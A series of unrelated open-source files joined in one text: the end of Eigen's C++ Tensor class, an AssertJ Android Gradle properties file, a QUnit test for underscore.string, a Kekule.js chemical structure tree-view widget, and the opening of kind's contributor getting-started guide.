    typedef Tensor<Scalar_, NumIndices_, Options_, IndexType_> Self;
    typedef TensorBase<Tensor<Scalar_, NumIndices_, Options_, IndexType_> > Base;
    typedef typename Eigen::internal::nested<Self>::type Nested;
    typedef typename internal::traits<Self>::StorageKind StorageKind;
    typedef typename internal::traits<Self>::Index Index;
    typedef Scalar_ Scalar;
    typedef typename NumTraits<Scalar>::Real RealScalar;
    typedef typename Base::CoeffReturnType CoeffReturnType;

    // Compile-time traits consumed by TensorEvaluator:
    // alignment is only claimed when the build supports it and the user did
    // not request DontAlign; Layout reflects the requested storage order.
    enum {
      IsAligned = bool(EIGEN_MAX_ALIGN_BYTES>0) & !(Options_&DontAlign),
      Layout = Options_ & RowMajor ? RowMajor : ColMajor,
      CoordAccess = true,
      RawAccess = true
    };

    static const int Options = Options_;
    static const int NumIndices = NumIndices_;
    typedef DSizes<Index, NumIndices_> Dimensions;

  protected:
    // Owns the coefficient buffer together with the runtime dimensions.
    TensorStorage<Scalar, Dimensions, Options> m_storage;

#ifdef EIGEN_HAS_SFINAE
    // Distinguishes "normal" indices (an array<Index, NumIndices> or a single
    // integer) from custom index containers; the SFINAE-guarded overloads
    // below are enabled only for the latter.
    template<typename CustomIndices>
    struct isOfNormalIndex{
      static const bool is_array = internal::is_base_of<array<Index, NumIndices>, CustomIndices>::value;
      static const bool is_int = NumTraits<CustomIndices>::IsInteger;
      static const bool value = is_array | is_int;
    };
#endif

  public:
    // Metadata
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Index rank() const { return NumIndices; }
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Index dimension(std::size_t n) const { return m_storage.dimensions()[n]; }
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Dimensions& dimensions() const { return m_storage.dimensions(); }
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Index size() const { return m_storage.size(); }
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar *data() { return m_storage.data(); }
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar *data() const { return m_storage.data(); }

    // This makes EIGEN_INITIALIZE_COEFFS_IF_THAT_OPTION_IS_ENABLED
    // work, because that uses base().coeffRef() - and we don't yet
    // implement a similar class hierarchy
    inline Self& base() { return *this; }
    inline const Self& base() const { return *this; }

    // --- Read-only coefficient access ------------------------------------
#if EIGEN_HAS_VARIADIC_TEMPLATES
    template<typename... IndexTypes>
    EIGEN_DEVICE_FUNC inline const Scalar& coeff(Index firstIndex, Index secondIndex, IndexTypes... otherIndices) const
    {
      // The number of indices used to access a tensor coefficient must be equal to the rank of the tensor.
      EIGEN_STATIC_ASSERT(sizeof...(otherIndices) + 2 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE)
      return coeff(array<Index, NumIndices>{{firstIndex, secondIndex, otherIndices...}});
    }
#endif

    // normal indices
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& coeff(const array<Index, NumIndices>& indices) const
    {
      eigen_internal_assert(checkIndexRange(indices));
      return m_storage.data()[linearizedIndex(indices)];
    }

    // custom indices
#ifdef EIGEN_HAS_SFINAE
    template<typename CustomIndices,
             EIGEN_SFINAE_ENABLE_IF( !(isOfNormalIndex<CustomIndices>::value) )
    >
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& coeff(CustomIndices& indices) const
    {
        return coeff(internal::customIndices2Array<Index,NumIndices>(indices));
    }
#endif

    // Rank-0 (scalar) tensor access.
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& coeff() const
    {
      EIGEN_STATIC_ASSERT(NumIndices == 0, YOU_MADE_A_PROGRAMMING_MISTAKE);
      return m_storage.data()[0];
    }

    // Direct linear (flat) access into the underlying storage.
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& coeff(Index index) const
    {
      eigen_internal_assert(index >= 0 && index < size());
      return m_storage.data()[index];
    }

    // --- Writable coefficient access -------------------------------------
#if EIGEN_HAS_VARIADIC_TEMPLATES
    template<typename... IndexTypes>
    inline Scalar& coeffRef(Index firstIndex, Index secondIndex, IndexTypes... otherIndices)
    {
      // The number of indices used to access a tensor coefficient must be equal to the rank of the tensor.
      EIGEN_STATIC_ASSERT(sizeof...(otherIndices) + 2 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE)
      return coeffRef(array<Index, NumIndices>{{firstIndex, secondIndex, otherIndices...}});
    }
#endif

    // normal indices
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& coeffRef(const array<Index, NumIndices>& indices)
    {
      eigen_internal_assert(checkIndexRange(indices));
      return m_storage.data()[linearizedIndex(indices)];
    }

    // custom indices
#ifdef EIGEN_HAS_SFINAE
    template<typename CustomIndices,
             EIGEN_SFINAE_ENABLE_IF( !(isOfNormalIndex<CustomIndices>::value) )
    >
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& coeffRef(CustomIndices& indices)
    {
        return coeffRef(internal::customIndices2Array<Index,NumIndices>(indices));
    }
#endif

    // Rank-0 (scalar) tensor access.
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& coeffRef()
    {
      EIGEN_STATIC_ASSERT(NumIndices == 0, YOU_MADE_A_PROGRAMMING_MISTAKE);
      return m_storage.data()[0];
    }

    // Direct linear (flat) access into the underlying storage.
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& coeffRef(Index index)
    {
      eigen_internal_assert(index >= 0 && index < size());
      return m_storage.data()[index];
    }

    // --- operator() : const overloads ------------------------------------
#if EIGEN_HAS_VARIADIC_TEMPLATES
    template<typename... IndexTypes>
    inline const Scalar& operator()(Index firstIndex, Index secondIndex, IndexTypes... otherIndices) const
    {
      // The number of indices used to access a tensor coefficient must be equal to the rank of the tensor.
      EIGEN_STATIC_ASSERT(sizeof...(otherIndices) + 2 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE)
      return this->operator()(array<Index, NumIndices>{{firstIndex, secondIndex, otherIndices...}});
    }
#else
    // Pre-C++11 fallbacks: explicit overloads for ranks 2..5 only.
    EIGEN_DEVICE_FUNC
    EIGEN_STRONG_INLINE const Scalar& operator()(Index i0, Index i1) const
    {
      return coeff(array<Index, 2>(i0, i1));
    }
    EIGEN_DEVICE_FUNC
    EIGEN_STRONG_INLINE const Scalar& operator()(Index i0, Index i1, Index i2) const
    {
      return coeff(array<Index, 3>(i0, i1, i2));
    }
    EIGEN_DEVICE_FUNC
    EIGEN_STRONG_INLINE const Scalar& operator()(Index i0, Index i1, Index i2, Index i3) const
    {
      return coeff(array<Index, 4>(i0, i1, i2, i3));
    }
    EIGEN_DEVICE_FUNC
    EIGEN_STRONG_INLINE const Scalar& operator()(Index i0, Index i1, Index i2, Index i3, Index i4) const
    {
      return coeff(array<Index, 5>(i0, i1, i2, i3, i4));
    }
#endif

    // custom indices
#ifdef EIGEN_HAS_SFINAE
    template<typename CustomIndices,
             EIGEN_SFINAE_ENABLE_IF( !(isOfNormalIndex<CustomIndices>::value) )
    >
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& operator()(CustomIndices& indices) const
    {
        return coeff(internal::customIndices2Array<Index,NumIndices>(indices));
    }
#endif

    // normal indices
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& operator()(const array<Index, NumIndices>& indices) const
    {
      return coeff(indices);
    }

    // Linear (flat) indexing.
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& operator()(Index index) const
    {
      eigen_internal_assert(index >= 0 && index < size());
      return coeff(index);
    }

    // Rank-0 (scalar) tensors.
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& operator()() const
    {
      EIGEN_STATIC_ASSERT(NumIndices == 0, YOU_MADE_A_PROGRAMMING_MISTAKE);
      return coeff();
    }

    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& operator[](Index index) const
    {
      // The bracket operator is only for vectors, use the parenthesis operator instead.
      EIGEN_STATIC_ASSERT(NumIndices == 1, YOU_MADE_A_PROGRAMMING_MISTAKE);
      return coeff(index);
    }

    // --- operator() : non-const overloads --------------------------------
#if EIGEN_HAS_VARIADIC_TEMPLATES
    template<typename... IndexTypes>
    inline Scalar& operator()(Index firstIndex, Index secondIndex, IndexTypes... otherIndices)
    {
      // The number of indices used to access a tensor coefficient must be equal to the rank of the tensor.
      EIGEN_STATIC_ASSERT(sizeof...(otherIndices) + 2 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE)
      return operator()(array<Index, NumIndices>{{firstIndex, secondIndex, otherIndices...}});
    }
#else
    // Pre-C++11 fallbacks: explicit overloads for ranks 2..5 only.
    EIGEN_DEVICE_FUNC
    EIGEN_STRONG_INLINE Scalar& operator()(Index i0, Index i1)
    {
      return coeffRef(array<Index, 2>(i0, i1));
    }
    EIGEN_DEVICE_FUNC
    EIGEN_STRONG_INLINE Scalar& operator()(Index i0, Index i1, Index i2)
    {
      return coeffRef(array<Index, 3>(i0, i1, i2));
    }
    EIGEN_DEVICE_FUNC
    EIGEN_STRONG_INLINE Scalar& operator()(Index i0, Index i1, Index i2, Index i3)
    {
      return coeffRef(array<Index, 4>(i0, i1, i2, i3));
    }
    EIGEN_DEVICE_FUNC
    EIGEN_STRONG_INLINE Scalar& operator()(Index i0, Index i1, Index i2, Index i3, Index i4)
    {
      return coeffRef(array<Index, 5>(i0, i1, i2, i3, i4));
    }
#endif

    // normal indices
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& operator()(const array<Index, NumIndices>& indices)
    {
      return coeffRef(indices);
    }

    // custom indices
#ifdef EIGEN_HAS_SFINAE
    template<typename CustomIndices,
             EIGEN_SFINAE_ENABLE_IF( !(isOfNormalIndex<CustomIndices>::value) )
    >
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& operator()(CustomIndices& indices)
    {
      return coeffRef(internal::customIndices2Array<Index,NumIndices>(indices));
    }
#endif

    // Linear (flat) indexing.
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& operator()(Index index)
    {
      eigen_assert(index >= 0 && index < size());
      return coeffRef(index);
    }

    // Rank-0 (scalar) tensors.
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& operator()()
    {
      EIGEN_STATIC_ASSERT(NumIndices == 0, YOU_MADE_A_PROGRAMMING_MISTAKE);
      return coeffRef();
    }

    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& operator[](Index index)
    {
      // The bracket operator is only for vectors, use the parenthesis operator instead
      EIGEN_STATIC_ASSERT(NumIndices == 1, YOU_MADE_A_PROGRAMMING_MISTAKE)
      return coeffRef(index);
    }

    // --- Constructors ----------------------------------------------------
    EIGEN_DEVICE_FUNC
    EIGEN_STRONG_INLINE Tensor()
      : m_storage()
    {
    }

    EIGEN_DEVICE_FUNC
    EIGEN_STRONG_INLINE Tensor(const Self& other)
      : m_storage(other.m_storage)
    {
    }

#if EIGEN_HAS_VARIADIC_TEMPLATES
    template<typename... IndexTypes>
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Tensor(Index firstDimension, IndexTypes... otherDimensions)
        : m_storage(firstDimension, otherDimensions...)
    {
      // The number of dimensions used to construct a tensor must be equal to the rank of the tensor.
      EIGEN_STATIC_ASSERT(sizeof...(otherDimensions) + 1 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE)
    }
#else
    // Pre-C++11 fallbacks: ranks 1..5; the first argument of the storage
    // constructor is the total number of coefficients.
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE explicit Tensor(Index dim1)
      : m_storage(dim1, array<Index, 1>(dim1))
    {
      EIGEN_STATIC_ASSERT(1 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE)
    }
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Tensor(Index dim1, Index dim2)
      : m_storage(dim1*dim2, array<Index, 2>(dim1, dim2))
    {
      EIGEN_STATIC_ASSERT(2 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE)
    }
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Tensor(Index dim1, Index dim2, Index dim3)
      : m_storage(dim1*dim2*dim3, array<Index, 3>(dim1, dim2, dim3))
    {
      EIGEN_STATIC_ASSERT(3 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE)
    }
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Tensor(Index dim1, Index dim2, Index dim3, Index dim4)
      : m_storage(dim1*dim2*dim3*dim4, array<Index, 4>(dim1, dim2, dim3, dim4))
    {
      EIGEN_STATIC_ASSERT(4 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE)
    }
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Tensor(Index dim1, Index dim2, Index dim3, Index dim4, Index dim5)
      : m_storage(dim1*dim2*dim3*dim4*dim5, array<Index, 5>(dim1, dim2, dim3, dim4, dim5))
    {
      EIGEN_STATIC_ASSERT(5 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE)
    }
#endif

    /** Normal Dimension */
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE explicit Tensor(const array<Index, NumIndices>& dimensions)
        : m_storage(internal::array_prod(dimensions), dimensions)
    {
      EIGEN_INITIALIZE_COEFFS_IF_THAT_OPTION_IS_ENABLED
    }

    // Construct from an arbitrary tensor expression: the expression is
    // assigned into this tensor (resizing it to the expression's dimensions)
    // and evaluated on the default (CPU) device.
    template<typename OtherDerived>
    EIGEN_DEVICE_FUNC
    EIGEN_STRONG_INLINE Tensor(const TensorBase<OtherDerived, ReadOnlyAccessors>& other)
    {
      typedef TensorAssignOp<Tensor, const OtherDerived> Assign;
      Assign assign(*this, other.derived());
      resize(TensorEvaluator<const Assign, DefaultDevice>(assign, DefaultDevice()).dimensions());
      internal::TensorExecutor<const Assign, DefaultDevice>::run(assign, DefaultDevice());
    }
    template<typename OtherDerived>
    EIGEN_DEVICE_FUNC
    EIGEN_STRONG_INLINE Tensor(const TensorBase<OtherDerived, WriteAccessors>& other)
    {
      typedef TensorAssignOp<Tensor, const OtherDerived> Assign;
      Assign assign(*this, other.derived());
      resize(TensorEvaluator<const Assign, DefaultDevice>(assign, DefaultDevice()).dimensions());
      internal::TensorExecutor<const Assign, DefaultDevice>::run(assign, DefaultDevice());
    }

    // Assignment resizes this tensor to the rhs dimensions, then evaluates
    // the rhs expression into it on the default device.
    EIGEN_DEVICE_FUNC
    EIGEN_STRONG_INLINE Tensor& operator=(const Tensor& other)
    {
      typedef TensorAssignOp<Tensor, const Tensor> Assign;
      Assign assign(*this, other);
      resize(TensorEvaluator<const Assign, DefaultDevice>(assign, DefaultDevice()).dimensions());
      internal::TensorExecutor<const Assign, DefaultDevice>::run(assign, DefaultDevice());
      return *this;
    }
    template<typename OtherDerived>
    EIGEN_DEVICE_FUNC
    EIGEN_STRONG_INLINE Tensor& operator=(const OtherDerived& other)
    {
      typedef TensorAssignOp<Tensor, const OtherDerived> Assign;
      Assign assign(*this, other);
      resize(TensorEvaluator<const Assign, DefaultDevice>(assign, DefaultDevice()).dimensions());
      internal::TensorExecutor<const Assign, DefaultDevice>::run(assign, DefaultDevice());
      return *this;
    }

    // --- Resizing --------------------------------------------------------
#if EIGEN_HAS_VARIADIC_TEMPLATES
    template<typename... IndexTypes> EIGEN_DEVICE_FUNC
    void resize(Index firstDimension, IndexTypes... otherDimensions)
    {
      // The number of dimensions used to resize a tensor must be equal to the rank of the tensor.
      EIGEN_STATIC_ASSERT(sizeof...(otherDimensions) + 1 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE)
      resize(array<Index, NumIndices>{{firstDimension, otherDimensions...}});
    }
#endif

    /** Normal Dimension */
    EIGEN_DEVICE_FUNC void resize(const array<Index, NumIndices>& dimensions)
    {
      int i;
      Index size = Index(1);
      for (i = 0; i < NumIndices; i++) {
        // Guard against the total coefficient count overflowing Index.
        internal::check_rows_cols_for_overflow<Dynamic>::run(size, dimensions[i]);
        size *= dimensions[i];
      }
#ifdef EIGEN_INITIALIZE_COEFFS
      // Only (re)initialize the coefficients when the size actually changed.
      bool size_changed = size != this->size();
      m_storage.resize(size, dimensions);
      if(size_changed) EIGEN_INITIALIZE_COEFFS_IF_THAT_OPTION_IS_ENABLED
#else
      m_storage.resize(size, dimensions);
#endif
    }

    // Why this overload, DSizes is derived from array ??? //
    EIGEN_DEVICE_FUNC void resize(const DSizes<Index, NumIndices>& dimensions) {
      array<Index, NumIndices> dims;
      for (int i = 0; i < NumIndices; ++i) {
        dims[i] = dimensions[i];
      }
      resize(dims);
    }

    EIGEN_DEVICE_FUNC
    void resize()
    {
      EIGEN_STATIC_ASSERT(NumIndices == 0, YOU_MADE_A_PROGRAMMING_MISTAKE);
      // Nothing to do: rank 0 tensors have fixed size
    }

    /** Custom Dimension */
#ifdef EIGEN_HAS_SFINAE
    template<typename CustomDimension,
             EIGEN_SFINAE_ENABLE_IF( !(isOfNormalIndex<CustomDimension>::value) )
    >
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE void resize(CustomDimension& dimensions)
    {
      resize(internal::customIndices2Array<Index,NumIndices>(dimensions));
    }
#endif

#ifndef EIGEN_EMULATE_CXX11_META_H
    // Resize from a compile-time Sizes<> list (real C++11 meta implementation).
    template <typename std::ptrdiff_t... Indices>
    EIGEN_DEVICE_FUNC
    void resize(const Sizes<Indices...>& dimensions) {
      array<Index, NumIndices> dims;
      for (int i = 0; i < NumIndices; ++i) {
        dims[i] = static_cast<Index>(dimensions[i]);
      }
      resize(dims);
    }
#else
    // Resize from the emulated fixed-capacity Sizes<V1..V5> type.
    template <std::size_t V1, std::size_t V2, std::size_t V3, std::size_t V4, std::size_t V5>
    EIGEN_DEVICE_FUNC
    void resize(const Sizes<V1, V2, V3, V4, V5>& dimensions) {
      array<Index, NumIndices> dims;
      for (int i = 0; i < NumIndices; ++i) {
        dims[i] = static_cast<Index>(dimensions[i]);
      }
      resize(dims);
    }
#endif

  protected:
    // Debug-only validation: every index must be >= 0 and strictly smaller
    // than the corresponding dimension.
    bool checkIndexRange(const array<Index, NumIndices>& indices) const
    {
      using internal::array_apply_and_reduce;
      using internal::array_zip_and_reduce;
      using internal::greater_equal_zero_op;
      using internal::logical_and_op;
      using internal::lesser_op;

      return
        // check whether the indices are all >= 0
        array_apply_and_reduce<logical_and_op, greater_equal_zero_op>(indices) &&
        // check whether the indices fit in the dimensions
        array_zip_and_reduce<logical_and_op, lesser_op>(indices, m_storage.dimensions());
    }

    // Maps a multi-dimensional index to the flat storage offset, honoring the
    // tensor's storage order (row- or column-major).
    EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Index linearizedIndex(const array<Index, NumIndices>& indices) const
    {
      if (Options&RowMajor) {
        return m_storage.dimensions().IndexOfRowMajor(indices);
      } else {
        return m_storage.dimensions().IndexOfColMajor(indices);
      }
    }
};
} // end namespace Eigen
#endif // EIGEN_CXX11_TENSOR_TENSOR_H
| {
"pile_set_name": "Github"
} |
POM_ARTIFACT_ID=assertj-android-cardview-v7
POM_NAME=AssertJ for Android CardView v7
POM_PACKAGING=aar
| {
"pile_set_name": "Github"
} |
// QUnit checks for underscore.string running in standalone mode
// (i.e. without underscore.js loaded on the page).
$(document).ready(function () {
  module("String extensions");

  // Without underscore.js, the bare _ symbol must not be callable.
  var callRootAsFunction = function () {
    _("foo")
  };

  test("underscore not included", function () {
    raises(callRootAsFunction, /TypeError/);
  });

  test("provides standalone functions", function () {
    // The string helpers are reachable directly under _.str.
    equal(typeof _.str.trim, "function");
  });
});
| {
"pile_set_name": "Github"
} |
/**
* @fileoverview
* A tree widget to display the internal structure of chem object (such as ChemSpace, Molecule and so on).
* @author Partridge Jiang
*/
/*
* requires /lan/classes.js
* requires /utils/kekule.utils.js
* requires /widgets/kekule.widget.nestedContainers.js
* requires /widgets/commonCtrls/kekule.widget.treeViews.js
* requires /widgets/chem/kekule.chemWidget.base.js
*/
(function(){
"use strict";

// NOTE(review): CCNS is captured before the Object.extend call below; this
// relies on Object.extend mutating (not replacing) the original object so
// the new class names are visible through CCNS — confirm in the Kekule core.
var CCNS = Kekule.ChemWidget.HtmlClassNames;

/** @ignore */
Kekule.ChemWidget.HtmlClassNames = Object.extend(Kekule.ChemWidget.HtmlClassNames, {
  CHEM_STRUCT_TREE_VIEW: 'K-Chem-Struct-TreeView',
  CHEM_STRUCT_TREE_VIEW_ITEM_TITLE: 'K-Chem-Struct-TreeView-ItemTitle',
  CHEM_STRUCT_TREE_VIEW_ITEM_TYPE: 'K-Chem-Struct-TreeView-ItemType'
});

/**
 * An tree view widget to display internal relationship of chem objects.
 * @class
 * @augments Kekule.Widget.TreeView
 *
 * @param {Variant} parentOrElementOrDocument
 * @param {Kekule.ChemObject} rootObj
 *
 * @property {Kekule.ChemObject} rootObj Root chem object to be displayed in tree view.
 * @property {Bool} enableLiveUpdate If set to true, the tree view will automatically updated when chem objects changed.
 */
Kekule.ChemWidget.StructureTreeView = Class.create(Kekule.Widget.TreeView,
/** @lends Kekule.ChemWidget.StructureTreeView# */
{
  /** @private */
  CLASS_NAME: 'Kekule.ChemWidget.StructureTreeView',
  /** @construct */
  initialize: function(/*$super, */parentOrElementOrDocument, rootObj)
  {
    this.tryApplySuper('initialize', [parentOrElementOrDocument]) /* $super(parentOrElementOrDocument) */;
    // objMap links each chem object to its tree item element.
    // MapEx(true): presumably enables non-object keys or weak semantics —
    // TODO confirm against Kekule.MapEx documentation.
    this.setPropStoreFieldValue('objMap', new Kekule.MapEx(true));
    this.setEnableLiveUpdate(true);
    this.setEnableMultiSelect(true);
    this.setRootObj(rootObj);
    // Live-update pause counter: 0 means active, negative means paused
    // (each pauseLiveUpdate call decrements, each resume increments).
    this._pauseLiveUpdateFlag = 0;
    // Objects that changed while updates were paused; refreshed on resume.
    this._changedObjects = [];
  },
  /** @private */
  initProperties: function()
  {
    this.defineProp('rootObj', {'dataType': 'Kekule.ChemObject', 'serializable': false,
      'setter': function(value)
      {
        var oldObj = this.getPropStoreFieldValue('rootObj');
        this.setPropStoreFieldValue('rootObj', value);
        this.rootObjChanged(value, oldObj);
      }
    });
    this.defineProp('enableLiveUpdate', {'dataType': DataType.BOOL});
    this.defineProp('objMap', {'dataType': 'Kekule.MapEx', 'setter': null, 'serializable': false});  // private property
  },
  /** @ignore */
  doGetWidgetClassName: function(/*$super*/)
  {
    return this.tryApplySuper('doGetWidgetClassName') /* $super() */ + ' ' + CCNS.CHEM_STRUCT_TREE_VIEW;
  },
  /** @private */
  rootObjChanged: function(newValue, oldValue)
  {
    // Rebuild the whole tree and move the 'change' listener to the new root.
    this.clearChildItems();
    this.getObjMap().clear();
    if (oldValue)
      this._uninstallRootEventHandler(oldValue);
    if (newValue)
    {
      this._fillTree(newValue);
      this._installRootEventHandler(newValue);
    }
  },
  /**
   * Pause the live update process.
   * Changed objects will be stored and the corresponding tree items will be refreshed
   * after the live update is resumed.
   */
  pauseLiveUpdate: function()
  {
    // Transitioning from active to paused: reset state before counting down.
    if (this._pauseLiveUpdateFlag >= 0)
    {
      this._pauseLiveUpdateFlag = 0;
      this._changedObjects = [];
    }
    // Nested pauses decrement further; a matching number of resumes is needed.
    --this._pauseLiveUpdateFlag;
    return this;
  },
  /**
   * Resume the live update process.
   */
  resumeLiveUpdate: function()
  {
    ++this._pauseLiveUpdateFlag;
    if (this._pauseLiveUpdateFlag >= 0)  // do actual resume
    {
      this._pauseLiveUpdateFlag = 0;
      // Flush refreshes queued while paused.
      // NOTE(review): _changedObjects is not cleared here; the next
      // pauseLiveUpdate call resets it — confirm this is intended.
      for (var i = 0, l = this._changedObjects.length; i < l; ++i)
      {
        this.refreshObject(this._changedObjects[i]);
      }
    }
  },
  // Returns true while live updates are suspended (pause counter below zero).
  isLiveUpdatePaused: function()
  {
    return (this._pauseLiveUpdateFlag < 0);
  },
  /** @private */
  _installRootEventHandler: function(root)
  {
    root.addEventListener('change', this.reactChemObjChange, this);
  },
  /** @private */
  _uninstallRootEventHandler: function(root)
  {
    root.removeEventListener('change', this.reactChemObjChange, this);
  },
  /** @private */
  reactChemObjChange: function(e)
  {
    if (this.getEnableLiveUpdate())
    {
      if (this.isLiveUpdatePaused())
      {
        // Only queue objects that already have a tree item.
        if (this.getObjMap().get(e.target))
          Kekule.ArrayUtils.pushUnique(this._changedObjects, e.target);
      }
      else
      {
        this.refreshObject(e.target);
      }
    }
  },
  /**
   * Refresh tree item on chemObj.
   * @param {Kekule.ChemObject} chemObj
   */
  refreshObject: function(chemObj)
  {
    // get corresponding tree node
    var treeItem = this.getObjMap().get(chemObj);
    if (treeItem)
    {
      this._updateTreeItem(treeItem, chemObj);
    }
    return this;
  },
  /**
   * Fill tree with rootObj data.
   * @param {Kekule.ChemObject} rootObj
   * @private
   */
  _fillTree: function(rootObj)
  {
    if (rootObj)
    {
      this.clearChildItems();
      this._updateTreeItem(this.appendChildItem(), rootObj);
    }
  },
  /**
   * Update tree item properties according to chemObj data.
   * Existing child items are reused in place; surplus items are removed,
   * missing ones appended, then each child is updated recursively.
   * @param {HTMLElement} treeItem
   * @param {Kekule.ChemObject} chemObj
   * @private
   */
  _updateTreeItem: function(treeItem, chemObj)
  {
    //console.log('update tree', chemObj.getClassName());
    var title = this._getChemObjDisplayTitle(chemObj);
    var data = {'text': title, 'obj': chemObj};
    this.setItemData(treeItem, data);
    this.getObjMap().set(chemObj, treeItem);
    //this.clearChildItems(treeItem);
    var oldChildItemCount = this.getChildItemCount(treeItem);
    var l = chemObj.getChildCount();
    for (var i = 0; i < l; ++i)
    {
      var child = chemObj.getChildAt(i);
      /*
      if (!child.isSelectable())
        continue;
      */
      //var childItem = this.appendChildItem(treeItem);
      var childItem;
      // Reuse an existing item when possible, otherwise create a new one.
      if (i < oldChildItemCount)
        childItem = this.getChildItemAt(treeItem, i);
      else
        childItem = this.appendChildItem(treeItem);
      this._updateTreeItem(childItem, child);
    }
    // remove extra tree nodes
    if (oldChildItemCount > l)
    {
      // Iterate backwards so removal does not shift pending indices.
      for (var i = oldChildItemCount - 1; i >= l; --i)
      {
        this.removeChildItemAt(treeItem, i);
      }
    }
  },
  /**
   * Build the HTML label for a tree item: the object's id (if any) followed
   * by its short class name in parentheses.
   * @private
   */
  _getChemObjDisplayTitle: function(chemObj)
  {
    var result = '';
    var id = chemObj.getId();
    if (id)
      result += '<span class="' + CCNS.CHEM_STRUCT_TREE_VIEW_ITEM_TITLE + '">' + id + '</span>';
    var className = chemObj.getClassName();
    // get last part of className
    var cnameParts = className.split('.');
    var cname = cnameParts.length? cnameParts[cnameParts.length - 1]: className;
    var stype = '<span class="' + CCNS.CHEM_STRUCT_TREE_VIEW_ITEM_TYPE + '">(' + cname + ')</span>';
    //return result + '(' + cname + ')';
    return result + stype;
  },
  /**
   * Make tree items corresponding to chemObjs to be selected.
   * @param {Array} chemObjs
   */
  selectChemObjs: function(chemObjs)
  {
    var items = [];
    for (var i = 0, l = chemObjs.length; i < l; ++i)
    {
      var obj = chemObjs[i];
      var item = this.getObjMap().get(obj);
      if (item)
        items.push(item);
    }
    this.select(items);
    return this;
  },
  /**
   * Returns corresponding chemObjs linked to selected tree items.
   * @returns {Array}
   */
  getSelectedChemObjs: function()
  {
    var result = [];
    var items = this.getSelection();
    if (items && items.length)
    {
      for (var i = 0, l = items.length; i < l; ++i)
      {
        var data = this.getItemData(items[i]);
        if (data && data.obj)
          result.push(data.obj);
      }
    }
    return result;
  }
});

})();
"pile_set_name": "Github"
} |
---
title: "Getting Started"
menu:
main:
parent: "contributing"
identifier: "getting started"
weight: 1
---
# Getting Started
Welcome! This guide covers how to get started contributing to kind.
## 1. Read the Kubernetes community guidelines
Make sure you read the [Kubernetes community guidelines][community].
In particular, read through the [Kubernetes contributor guidelines][contributor].
Additionally, note that kind is developed on [GitHub][github] and will require
an account to contribute.
## 2. Install Tools
### Install git
Our source code is managed with [`git`][git], to develop locally you
will need to install `git`.
You can check if `git` is already on your system and properly installed with
the following command:
```
git --version
```
### Install Hugo
If you wish to contribute to the documentation, it is recommended but not
required to install [hugo], which we use to develop this site.
Please see: https://gohugo.io/getting-started/installing/
### Install Go
To work on kind's codebase you will need [Go][golang].
Install or upgrade [Go using the instructions for your operating system][golang].
You can check if Go is in your system with the following command:
```
go version
```
Preferably Go `1.13` or greater should be installed.
Correct automatic formatting of the source with `gofmt` requires at least
`1.11.0`.
Working with Go [modules] (which we use for dependency management) requires at
least `1.11.4` due to checksum bugs in lower versions.
### Install Docker
Currently, to create clusters you will need to install [Docker][docker].
If you haven't already, [install Docker][install docker], following the
[official instructions][install docker].
If you have an existing installation, check your version and make sure you have
the latest Docker.
To check if `docker` has been installed:
```
docker --version
```
This documentation is written using Docker version 18.09.2.
## 3. Read The Docs
The [design principles], [1.0 roadmap], [project structure], and [initial design]
may be helpful to review before contributing.
## 4. Reaching Out
Issues are tracked on GitHub. Please check [the issue tracker][issues] to see
if there is any existing discussion or work related to your interests.
If you do not see anything, please [file a new issue][file an issue].
Please reach out for bugs, feature requests, and other issues!
The maintainers of this project are reachable via:
- [Kubernetes Slack] in the [#kind] channel
- [filing an issue][file an issue]
- The Kubernetes [SIG-Testing Mailing List]
Current maintainers are [@BenTheElder] and [@munnerz] - feel free to
reach out if you have any questions!
See also: the Kubernetes [community page].
[git]: https://git-scm.com/
[hugo]: https://gohugo.io
[issues]: https://github.com/kubernetes-sigs/kind/issues
[file an issue]: https://github.com/kubernetes-sigs/kind/issues/new
[design principles]: /docs/design/principles
